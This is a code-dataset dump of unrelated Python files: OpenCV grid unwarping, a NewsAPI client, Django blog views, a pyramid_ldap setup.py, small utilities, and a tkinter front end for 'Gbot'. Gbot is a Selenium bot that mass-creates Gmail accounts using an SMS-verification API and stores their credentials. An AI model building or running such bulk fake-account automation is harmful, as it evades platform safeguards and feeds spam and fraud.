cv2.adaptiveThreshold(res,255,0,1,19,2)\ncontour,hier = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\nmax_area = 0\nbest_cnt = None\nfor cnt in contour:\n area = cv2.contourArea(cnt)\n if area > 1000: # need to test other values for project images\n if area > max_area:\n max_area = area\n best_cnt = cnt\n\ncv2.drawContours(mask,[best_cnt],0,255,-1)\ncv2.drawContours(mask,[best_cnt],0,0,2)\n\nres = cv2.bitwise_and(res,mask)\n\n# 3. Finding Vertical lines\n\nkernelx = cv2.getStructuringElement(cv2.MORPH_RECT,(2,10)) # a 2 by 10 rectangle\n\ndx = cv2.Sobel(res,cv2.CV_16S,1,0)\ndx = cv2.convertScaleAbs(dx)\ncv2.normalize(dx,dx,0,255,cv2.NORM_MINMAX)\nret,close = cv2.threshold(dx,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,kernelx,iterations = 1)\n\ncontour, hier = cv2.findContours(close,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\nfor cnt in contour:\n x,y,w,h = cv2.boundingRect(cnt)\n if h/w > 5:\n cv2.drawContours(close,[cnt],0,255,-1)\n else:\n cv2.drawContours(close,[cnt],0,0,-1)\nclose = cv2.morphologyEx(close,cv2.MORPH_CLOSE,None,iterations = 2)\nclosex = close.copy()\n\n# 4. Finding Horizontal Lines\n\nkernely = cv2.getStructuringElement(cv2.MORPH_RECT,(10,2))\ndy = cv2.Sobel(res,cv2.CV_16S,0,2)\ndy = cv2.convertScaleAbs(dy)\ncv2.normalize(dy,dy,0,255,cv2.NORM_MINMAX)\nret,close = cv2.threshold(dy,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,kernely)\n\ncontour, hier = cv2.findContours(close,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\nfor cnt in contour:\n x,y,w,h = cv2.boundingRect(cnt)\n if w/h > 5:\n cv2.drawContours(close,[cnt],0,255,-1)\n else:\n cv2.drawContours(close,[cnt],0,0,-1)\n\nclose = cv2.morphologyEx(close,cv2.MORPH_DILATE,None,iterations = 2)\nclosey = close.copy()\n\n# 5. Finding Grid Points\n\nres = cv2.bitwise_and(closex,closey)\n\n############################################################################################################################################################\n\n## get rid of the grids\n\nres = cv2.bitwise_or(closex, closey)\nx = np.where(res > 0)\nx = np.array(x)\n\nfor i in range(shape(x)[1]):\n gray[x[0,i], x[1,i]] = 255\n\n############################################################################################################################################################\n\n# 6. Correcting the defects\n\ncontour, hier = cv2.findContours(res,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\ncentroids = []\nfor cnt in contour:\n mom = cv2.moments(cnt)\n (x,y) = int(mom['m10']/mom['m00']), int(mom['m01']/mom['m00'])\n cv2.circle(img,(x,y),4,(0,255,0),-1)\n centroids.append((x,y))\n\ncentroids = np.array(centroids,dtype = np.float32)\nc = centroids.reshape((shape(centroids)[0],2)) # check whether this line is required or not\n\n### just to properly sort the centroid indices\n\nc2 = c[np.argsort(c[:,1])] # sort along y-axis (sort the values along y-axis only leaving x-axis as it is to get the coordinates with y-axis sorted)\n # (100,2) array\n\nb = np.vstack([c2[i*10:(i+1)*10][np.argsort(c2[i*10:(i+1)*10,0])] for i in xrange(10)])\nbm = b.reshape((10,10,2))\n####\n\n# unwarp the image\n\noutput = np.zeros((450,450,3),np.uint8)\nfor i,j in enumerate(b): # almost like a percentage basis\n ri = i/10\n ci = i%10\n if ci != 9 and ri!=9:\n src = bm[ri:ri+2, ci:ci+2 , :].reshape((4,2))\n dst = np.array( [ [ci*50,ri*50],[(ci+1)*50-1,ri*50],[ci*50,(ri+1)*50-1],[(ci+1)*50-1,(ri+1)*50-1] ], np.float32) # see tutorial for details (logic)\n retval = cv2.getPerspectiveTransform(src,dst)\n warp = cv2.warpPerspective(res2,retval,(450,450))\n output[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n\n############################################################################################################################################################\n\n## edit for project\n\na = round(shape(c2)[0]/10)\nb = np.vstack([c2[i*a:(i+1)*a][np.argsort(c2[i*a:(i+1)*a,0])] for i in xrange(10)])\na1 = round(shape(c2)[0]/a)\nbm = b.reshape((a1,a,2))\noutput = np.zeros((432, 576, 3),np.uint8)\n\nfor i,j in enumerate(b):\n ri = i/6\n ci = i%10\n if ri != 9 and ci < 5:\n src = bm[ri:ri+2, ci:ci+2 , :].reshape((4,2))\n #print i, src\n dst = np.array( [ [ci*50,ri*50],[(ci+1)*50-1,ri*50],[ci*50,(ri+1)*50-1],[(ci+1)*50-1,(ri+1)*50-1] ], np.float32)\n retval = cv2.getPerspectiveTransform(src,dst)\n warp = cv2.warpPerspective(res2,retval,(432, 576))\n output[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n\n\nretval = cv2.getPerspectiveTransform(src,dst)\nwarp = cv2.warpPerspective(res2,retval,(450,450))\noutput[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1] = warp[ri*50:(ri+1)*50-1 , ci*50:(ci+1)*50-1].copy()\n","sub_path":"Other files (test scripts etc.)/OpenCV.py","file_name":"OpenCV.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396929147","text":"\"\"\"\nThis file hold functions and constants that are specific to the\nNews API at http://newsapi.org\n\"\"\"\n\nimport logging\n\nfrom newsapi import NewsApiClient\n\nlogger = logging.getLogger(__name__)\n\ndef get_all_sources(news_api_key):\n\t\"\"\"\n\tReturn all the sources from the NewsAPI.\n\n\tReturn format:\n\t\tIf no error:\n\t\t\t[\n\t\t\t\t{\n\t\t\t\t\t'id': 'abc-news',\n\t\t\t\t\t'name': 'ABC News',\n\t\t\t\t\t'description': 'Your trusted source for breaking blah blah.',\n\t\t\t\t\t'url': 'https://abcnews.go.com',\n\t\t\t\t\t'category': 'general',\n\t\t\t\t\t'language': 'en',\n\t\t\t\t\t'country': 'us'\n\t\t\t\t}\n\t\t\t]\n\t\tIf error:\n\t\t\tRasies exception.\n\t\"\"\"\n\tnews_api_client = NewsApiClient(api_key=news_api_key)\n\n\t# This can also raise an excption\n\tsources = news_api_client.get_sources()\n\n\tif sources[\"status\"] == \"ok\":\n\t\t# We're all good\n\t\treturn sources[\"sources\"]\n\telse:\n\t\tlogger.exception(\"Error getting sources. Got the following return object: {0}\".format(\n\t\t\tsources\n\t\t), exc_info=True)\n\n\t\traise Exception(\"There was an error getting sources. See log.\")\n\ndef get_top_articles(source_id, news_api_key):\n\t\"\"\"\n\tReturn all the current top articles from the given source.\n\tIf there is any error whatsoever, this will throw an exception. So, if articles are returned\n\tand the fuunc exits successfully, there have been no errors.\n\n\tReturn format:\n\t\tIf error:\n\t\t\traises Exception\n\t\tIf no error:\n\t\t\t[\n\t\t\t\t{\n\t\t\t\t\t'source_id': 'abc-news', \n\t\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t\t'content': 'Florida Republican Rep. Matt Gaetz is facing continued ... … [+3846 chars]'\n\t\t\t\t}, \n\t\t\t\t{\n\t\t\t\t\t...\n\t\t\t\t}\n\t\t\t]\n\t\"\"\"\n\tnews_api_client = NewsApiClient(api_key=news_api_key)\n\n\tresponse = news_api_client.get_top_headlines(\n\t\tsources=source_id,\n\t\tpage_size=100,\n\t\tpage=1 # This is 1-indexed\n\t)\n\n\tif response[\"status\"] != \"ok\":\n\t\tlogger.exception(\"Error getting articles for {0}. Got the following return object: {1}\".format(\n\t\t\tsource_id,\n\t\t\tresponse\n\t\t), exc_info=True)\n\n\t\traise Exception(\"There was an error getting sources. See log.\")\n\t\n\t# Now, we need to check if we actually got all the top articles from this one request\n\t# response will contain a 'totalResults' field, which we can use to figure out if there are more we need to get\n\n\tcurr_articles = clean_top_articles(response[\"articles\"])\n\tnum_total_articles = int(response['totalResults'])\n\tcurr_page = 2\n\twhile num_total_articles < len(curr_articles):\n\t\tresponse = news_api_client.get_top_headlines(\n\t\t\tsources=source_id,\n\t\t\tpage_size=100,\n\t\t\tpage=2 # This is 1-indexed\n\t\t)\n\n\t\tif response[\"status\"] != \"ok\":\n\t\t\tlogger.exception(\"Error getting articles for {0}. Got the following return object: {1}\".format(\n\t\t\t\tsource_id,\n\t\t\t\tresponse\n\t\t\t), exc_info=True)\n\n\t\t\traise Exception(\"There was an error getting sources. See log.\")\n\t\telse:\n\t\t\tcurr_articles.extend(clean_top_articles(response['articles']))\n\t\t\tcurr_page += 1\n\n\treturn curr_articles\n\ndef clean_top_articles(articles):\n\t\"\"\"\n\tBefore: \n\t\t[\n\t\t\t{\n\t\t\t\t'source': {\n\t\t\t\t\t'id': 'abc-news', \n\t\t\t\t\t...\n\t\t\t\t}\n\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t'content': 'Florida Republican Rep. Matt Gaetz is facing continued ... … [+3846 chars]'\n\t\t\t}, \n\t\t\t{\n\t\t\t\t...\n\t\t\t}\n\t\t]\n\n\tAfter:\n\t\t[\n\t\t\t{\n\t\t\t\t'source_id': 'abc-news', \n\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t'content': 'Florida Republican Rep. Matt Gaetz is facing continued ... … [+3846 chars]'\n\t\t\t}, \n\t\t\t{\n\t\t\t\t...\n\t\t\t}\n\t\t]\n\n\t\"\"\"\n\n\tfor article in articles:\n\t\tsource_id = article['source']['id']\n\t\tdel article['source']\n\t\tarticle['source_id'] = source_id\n\t\n\treturn articles\n\n###############################\n# CONSTANTS\n###############################\n\nnews_api_categories = {\n \"business\",\n \"entertainment\",\n \"general\",\n \"health\",\n \"science\",\n \"sports\",\n \"technology\"\n}\n\nnews_api_languages = {\n \"ar\",\n \"de\",\n \"en\"\n \"es\",\n \"fr\",\n \"he\",\n \"it\",\n \"nl\",\n \"no\",\n \"pt\",\n \"ru\",\n \"se\",\n \"ud\",\n \"zh\"\n}\n\nnews_api_countries = {\n \"ae\",\n\t\"ar\",\n\t\"at\",\n\t\"au\",\n\t\"be\",\n\t\"bg\",\n\t\"br\",\n\t\"ca\",\n\t\"ch\",\n\t\"cn\",\n\t\"co\",\n\t\"cu\",\n\t\"cz\",\n\t\"de\",\n\t\"eg\",\n\t\"fr\",\n\t\"gb\",\n\t\"gr\",\n\t\"hk\",\n\t\"hu\",\n\t\"id\",\n\t\"ie\",\n\t\"il\",\n\t\"in\",\n\t\"it\",\n\t\"jp\",\n\t\"kr\",\n\t\"lt\",\n\t\"lv\",\n\t\"ma\",\n\t\"mx\",\n\t\"my\",\n\t\"ng\",\n\t\"nl\",\n\t\"no\",\n\t\"nz\",\n\t\"ph\",\n\t\"pl\",\n\t\"pt\",\n\t\"ro\",\n\t\"rs\",\n\t\"ru\",\n\t\"sa\",\n\t\"se\",\n\t\"sg\",\n\t\"si\",\n\t\"sk\",\n\t\"th\",\n\t\"tr\",\n\t\"tw\",\n\t\"ua\",\n\t\"us\",\n\t\"ve\",\n\t\"za\"\n}\n\n","sub_path":"news-worker/worker/utils/news_api.py","file_name":"news_api.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"608262620","text":"import cbtl_base\nfrom PIL import Image\n\ndef withinRange(px1,px2,tol):\n for i in range(2):\n if px1[i]-tol <= px2[i] <= px1[i]+tol:\n return False\n return True\n\ndef imgbool(img1,img2,tolerance):\n pmer = img1.load()\n cntre = img2.load()\n origmask = Image.new(\"RGBA\",img1.size,color = (0,0,0,0))\n mask = origmask.load()\n #thru all pixels: if they are not within tolerance range, write to mask.\n for y in range(img1.height):\n for x in range(img1.width):\n if not withinRange(pmer[x,y],cntre[x,y],tolerance):\n mask[x,y] = (0,0,0,255)\n #origmask.show()\n bg = Image.new(\"RGBA\",img1.size,color = (0,0,0,255))\n return Image.composite(bg,img2,mask = origmask)\n\nif __name__ == \"__main__\":\n intro1=Image.open(\"./intro1.png\")\n intro2=Image.open(\"./intro2.png\")\n imgbool(intro1,intro2,0).show()\n imgbool(intro1,intro2,2).show()\n imgbool(intro1,intro2,5).show()\n imgbool(intro1,intro2,15).show()\n","sub_path":"cbtl_bool.py","file_name":"cbtl_bool.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"235098891","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = open(os.path.join(here, 'README.rst')).read()\nCHANGES = open(os.path.join(here, 'CHANGES.txt')).read()\n\nrequires = [\n 'pyramid>=1.3a9',\n ]\nif not 'READTHEDOCS' in os.environ:\n # hail mary for readthedocs\n requires.extend(['ldappool', 'python-ldap'])\n\nsampleapp_extras = [\n 'waitress',\n 'pyramid_debugtoolbar',\n ]\ntesting_extras = ['nose', 'coverage']\ndocs_extras = ['Sphinx']\n\nsetup(name='pyramid_ldap',\n version='0.1',\n description='pyramid_ldap',\n long_description=README + '\\n\\n' + CHANGES,\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Pylons\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: System :: Systems Administration :: Authentication/Directory :: LDAP\",\n \"License :: Repoze Public License\",\n ],\n author='Chris McDonough',\n author_email='pylons-discuss@groups.google.com',\n url='http://pylonsproject.org',\n license=\"BSD-derived (http://www.repoze.org/LICENSE.txt)\",\n keywords='web pyramid pylons ldap',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n install_requires=requires,\n tests_require=requires,\n extras_require = {\n 'sampleapp':sampleapp_extras,\n 'docs':docs_extras,\n 'testing':testing_extras,\n },\n test_suite=\"pyramid_ldap\",\n entry_points = \"\"\"\\\n [paste.app_factory]\n sampleapp = sampleapp:main\n \"\"\",\n )\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"603565083","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .models import Post\nfrom .forms import EmailPostForm\nfrom django.core.mail import send_mail\nfrom taggit.models import Tag\n\n# Create your views here.\ndef post_list(request, tag_slug=None):\n object_list=Post.published.all()\n tag = None\n\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n object_list = object_list.filter(tags__in=[tag])\n\n paginator = Paginator(object_list, 3)#3 posts in each page\n page = request.GET.get('page')\n try:\n \tposts = paginator.page(page)\n except PageNotAnInteger:\n \t#if page is not an integer deliver the first page\n \tposts = paginator.page(1)\n except EmptyPage:\n \t#if page is out of range deliver last page of results\n \tposts = paginator.page(paginator.num_pages)\n return render(request, 'blog/post/list.html', {'page':page, 'posts':posts, 'tag':tag, 'active_blog': True})\n\ndef post_detail(request, year, month, day, post):\n\tpost = get_object_or_404(Post, slug=post,\n\t\tstatus='published',\n\t\tpublish__year=year,\n\t\tpublish__month=month,\n\t\tpublish__day=day)\n\treturn render(request, 'blog/post/detail.html', {'post':post, 'active_blog': True})\n\n\ndef post_share(request, post_id):\n # Retrieve post by id\n post = get_object_or_404(Post, id=post_id, status='published')\n sent = False\n\n if request.method == 'POST':\n # Form was submitted\n form = EmailPostForm(request.POST)\n if form.is_valid():\n # Form fields passed validation\n cd = form.cleaned_data\n post_url = request.build_absolute_uri(post.get_absolute_url())\n subject = '{} ({}) recommends you reading \"{}\"'.format(cd['name'], cd['email'], post.title)\n message = 'Read \"{}\" at {}\\n\\n{}\\'s comments: {}'.format(post.title, post_url, cd['name'], cd['comments'])\n send_mail(subject, message, 'admin@myblog.com', [cd['to']])\n sent = True\n else:\n \n if request.user.is_authenticated():\n form = EmailPostForm(initial = {'email': request.user.email, 'name': request.user.get_full_name()})\n else:\n form = EmailPostForm()\n\n return render(request, 'blog/post/share.html', {'post': post,\n 'form': form,\n 'sent': sent, 'active_blog': True})","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"653368522","text":"\n# 使用python自带的函数heapq完成堆排序\n\nimport heapq\nimport random\n\nli = list(range(100))\nrandom.shuffle(li)\nprint(li)\n\nheapq.heapify(li) # 建堆(小根堆)\nprint(li)\n\nn = len(li)\nfor i in range(n):\n print(heapq.heappop(li),end=\",\")","sub_path":"排序方法/python堆排序.py","file_name":"python堆排序.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"476915279","text":"import os\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport threading\nimport datetime\nimport configparser\nimport tkinter as tk\nfrom tkinter.scrolledtext import ScrolledText\nfrom tkinter.ttk import Notebook\nfrom tkinter import messagebox\nfrom selenium.common.exceptions import WebDriverException\n\nimport helper\nfrom gbot import Gbot\n\nclass Facade(tk.Tk):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.title('Gbot')\n\t\tself.geometry('600x600')\n\t\tself.head_font = ('Verdana', 12)\n\t\tself.gbot = None\t\n\t\tself.config = configparser.ConfigParser()\n\t\tself.configfile = helper.resource_path('config.ini')\n\t\tself.accounts_dir = helper.resource_path('results')\n\t\tself.namesfile = helper.resource_path('names.txt')\n\n\t\tself.current_date = datetime.datetime.now()\n\t\tself.current_date = self.current_date.strftime(\"%Y-%m-%d\")\n\t\t\n\t\ttab_control = Notebook(self)\n\t\tself.main(tab_control)\n\t\tself.accounts(tab_control)\n\t\tself.names(tab_control)\n\t\tself.configs(tab_control)\n\n\tdef main(self, tab_control):\n\t\tmain_tab = tk.Frame(tab_control)\n\t\ttab_control.add(main_tab, text='Главная')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n \n\t\tyes_sign = tk.PhotoImage(file=helper.resource_path('img/yes_sign.png'))\n\n\t\tself.accounts_amount = tk.IntVar()\n\t\tself.accounts_amount.set(10)\n\n\t\ttk.Label(main_tab, font=self.head_font, text='Лог:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.log_list_field = ScrolledText(main_tab, height=20)\n\t\tself.log_list_field.pack(fill=tk.X, padx=5)\n\n\t\ttk.Label(main_tab, font=self.head_font, text='Сколько аккаунтов создать:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(40, 0), padx=(5, 0))\n\t\taccounts_amount_field = tk.Entry(main_tab, textvariable=self.accounts_amount, width=30)\n\t\taccounts_amount_field.pack(side=tk.TOP, anchor=tk.NW, padx=(5, 0))\n\n\t\tself.start_btn = tk.Button(main_tab, text='Начать', command=self.on_start, width=30, height=2)\n\t\tself.start_btn.pack(side=tk.LEFT, anchor=tk.NW, pady=(30, 0), padx=(5, 0))\n\n\t\tstop_btn = tk.Button(main_tab, text='Стоп', command=self.on_stop, width=30, height=2)\n\t\tstop_btn.pack(side=tk.RIGHT, anchor=tk.NW, pady=(30, 0), padx=(0, 5))\n\n\tdef accounts(self, tab_control):\n\t\taccounts_tab = tk.Frame(tab_control)\n\t\ttab_control.add(accounts_tab, text='Аккаунты')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\ttk.Label(accounts_tab, font=self.head_font, text='Созданные аккаунты gmail:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.accounts_list_field = ScrolledText(accounts_tab)\n\t\tself.accounts_list_field.pack(expand=True, fill=tk.BOTH, pady=(0, 20), padx=5)\n\n\t\tcopy_btn = tk.Button(accounts_tab, text='Скопировать все', command=self.on_copy_accounts)\n\t\tcopy_btn.pack(side=tk.LEFT, padx=(5, 0), pady=(0, 10))\n\n\t\tcopy_today_btn = tk.Button(accounts_tab, text='Скопировать сегодняшние', command=self.on_copy_today_accounts)\n\t\tcopy_today_btn.pack(side=tk.LEFT, padx=(5, 0), pady=(0, 10))\n\n\t\tclear_btn = tk.Button(accounts_tab, text='Очистить все', command=self.on_clear_accounts)\n\t\tclear_btn.pack(side=tk.RIGHT, padx=(0, 5), pady=(0, 10))\n\t\t\n\t\tself.accounts_file = open(join(self.accounts_dir, self.current_date + '.txt'), 'a+')\n\n\t\tself.accounts_list = []\n\n\t\tfor file in listdir(self.accounts_dir):\n\t\t\tif isfile(join(self.accounts_dir, file)):\n\t\t\t\t_, file_ext = os.path.splitext(file)\n\t\t\t\tif file_ext == '.txt':\n\t\t\t\t\tself.accounts_list.append(join(self.accounts_dir, file))\n\n\t\tself.accounts_list.sort(key=lambda x: x.split('-'), reverse=True)\n\n\t\tfor file in self.accounts_list:\n\t\t\taccounts = open(file, 'r')\n\t\t\tfile_name, _ = os.path.splitext(file)\n\t\t\tfile_name_chunks = file_name.split(os.sep)\n\t\t\tfile_name = file_name_chunks[-1]\n\t\t\tfor account in accounts:\n\t\t\t\tself.accounts_list_field.insert(tk.END, file_name + ' | ' + account)\n\n\tdef names(self, tab_control):\n\t\tnames_tab = tk.Frame(tab_control)\n\t\ttab_control.add(names_tab, text='Имена')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\ttk.Label(names_tab, font=self.head_font, text='Имена:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.names_list_field = ScrolledText(names_tab)\n\t\tself.names_list_field.pack(expand=True, fill=tk.BOTH, pady=(0, 20), padx=5)\n\n\t\tnames = open(self.namesfile, 'r')\n\n\t\tfor name in names:\n\t\t\tself.names_list_field.insert(tk.END, name)\n\n\t\tsave_btn = tk.Button(names_tab, text='Сохранить', command=self.on_save_names, width=30, height=2)\n\t\tsave_btn.pack(side=tk.BOTTOM, anchor=tk.NE, padx=(0, 5), pady=(30, 10))\n\n\tdef configs(self, tab_control):\n\t\tconfigs_tab = tk.Frame(tab_control)\n\t\ttab_control.add(configs_tab, text='Настройки')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\tself.config.read(self.configfile)\n\t\tself.api_key = tk.StringVar()\n\t\tself.wait_code_time = tk.IntVar()\n\t\tself.request_for_code_time = tk.IntVar()\n\t\tself.backup_email = tk.StringVar()\n\t\tself.wait_element_time = tk.IntVar()\n\t\tself.wait_page_reload_time = tk.IntVar()\n\n\t\tself.api_key.set(self.config['api']['api_key'])\n\t\tself.wait_code_time.set(self.config['api']['wait_code_time'])\n\t\tself.request_for_code_time.set(self.config['api']['request_for_code_time'])\n\t\tself.backup_email.set(self.config['user_data']['backup_email'])\n\t\tself.wait_element_time.set(self.config['app']['wait_element_time'])\n\t\tself.wait_page_reload_time.set(self.config['app']['wait_page_reload_time'])\n\n\t\tfields = [\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Api ключ'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.api_key, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания смс кода'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_code_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания перед запросом\\nсмс кода'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.request_for_code_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Email адресс для восстановления'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.backup_email, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания появления\\n элемента'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_element_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания перед\\n перезагрузкой страницы'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_page_reload_time, width=35)\n\t\t\t]\n\t\t]\n\n\t\ti = 0\n\t\tfor field in fields:\n\t\t\tfield[0].grid(row=i, column=0, padx=5, pady=15)\n\t\t\tfield[1].grid(row=i, column=1, padx=5, pady=15)\n\t\t\ti += 1\n\n\t\tsave_btn = tk.Button(configs_tab, text='Сохранить', command=self.on_save_accounts, width=30, height=2)\n\t\tsave_btn.place(relx=0.991, rely=0.982, anchor=tk.SE)\n\n\tdef on_save_accounts(self):\n\t\tself.config['api'] = {\n\t\t\t'api_key': self.api_key.get(),\n\t\t\t'wait_code_time': self.wait_code_time.get(),\n\t\t\t'request_for_code_time': self.request_for_code_time.get()\n\t\t}\n\n\t\tself.config['user_data'] = {\n\t\t\t'backup_email': self.backup_email.get()\n\t\t}\n\n\t\tself.config['app'] = {\n\t\t\t'wait_element_time': self.wait_element_time.get(),\n\t\t\t'wait_page_reload_time': self.wait_page_reload_time.get()\n\t\t}\n\n\t\twith open(self.configfile, 'w+') as configfile:\n\t\t\tself.config.write(configfile)\n\t\t\tself.dialog('Уведомление', 'Настройки были успешно сохранены.')\n\n\tdef on_copy_accounts(self):\n\t\tself.clipboard_append(self.accounts_list_field.get('1.0', tk.END))\n\t\tself.dialog('Уведомление', 'Аккаунты были скопированы.\\nCTRL + V чтобы вставить.')\n\n\tdef on_copy_today_accounts(self):\n\t\taccounts_list = self.accounts_list_field.get('1.0', tk.END).split('\\n')\n\t\tcurrent_accounts_list = []\n\n\t\tfor account in accounts_list:\n\t\t\taccount_chunks = account.split(' | ')\n\t\t\tif account_chunks[0] == self.current_date:\n\t\t\t\tcurrent_accounts_list.append(' | '.join(account_chunks))\n\n\t\tcurrent_accounts_list = '\\n'.join(current_accounts_list)\n\n\t\tif not current_accounts_list:\n\t\t\tself.dialog('Уведомление', 'Вы не создали ни один аккаунт сегодня.')\n\t\telse:\n\t\t\tself.clipboard_append(current_accounts_list)\n\t\t\tself.dialog('Уведомление', 'Аккаунты были скопированы.\\nCTRL + V чтобы вставить.')\n\n\tdef dialog(self, title, message):\n\t\twindow = tk.Toplevel(menu='sdf')\n\t\twindow.geometry('%dx%d+%d+%d' % (300, 150, \n\t\t\tself.winfo_x() + (self.winfo_width() / 4), \n\t\t\tself.winfo_y() + (self.winfo_height() / 4))\n\t\t)\n\t\twindow.title(title)\n\t\ttk.Message(window, text=message, font=('Verdana', 15), width=300)\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.CENTER, pady=5)\n\t\ttk.Button(window, text='OK', width=20, command=lambda: window.destroy())\\\n\t\t\t.pack(side=tk.BOTTOM, anchor=tk.CENTER, pady=(0, 10))\n\n\t\twindow.after(3000, lambda: window.destroy())\n\t\treturn window\n\n\tdef on_clear_accounts(self):\n\t\tfor account in self.accounts_list:\n\t\t\tself.accounts_list_field.delete('1.0', tk.END)\n\t\t\tself.dialog('Уведомление', 'Аккаунты удалены.')\n\t\t\tos.remove(account)\n\n\tdef on_save_names(self):\n\t\tnames_list = self.names_list_field.get('1.0', tk.END).split('\\n')\n\t\tnames_list = list(filter(None, names_list))\n\t\tnames_list = [name.strip() for name in names_list]\n\t\tnames_list = '\\n'.join(names_list)\n\n\t\tnames = open(self.namesfile, 'w+')\n\t\tnames.write(names_list)\n\t\tnames.close()\n\t\tself.dialog('Уведомление', 'Имена были успешно сохранены.')\n\n\tdef on_start(self):\n\t\tthreading.Thread(target=self.gbot_start).start()\n\n\tdef on_stop(self):\n\t\tif self.gbot != None:\n\t\t\tself.gbot.destroy()\n\n\t\tself.start_btn.configure(state='normal')\n\n\tdef gbot_start(self):\n\t\ttry:\n\t\t\tself.start_btn.configure(state='disabled')\n\t\t\tself.gbot = Gbot(\n\t\t\t\tlambda message: self.logger(message),\n\t\t\t\tlambda account: self.add_account(account)\n\t\t\t)\n\t\t\tself.gbot.prepare()\n\t\t\tself.gbot.launch(self.accounts_amount.get())\n\t\texcept WebDriverException:\n\t\t\tself.start_btn.configure(state='normal')\n\n\tdef logger(self, 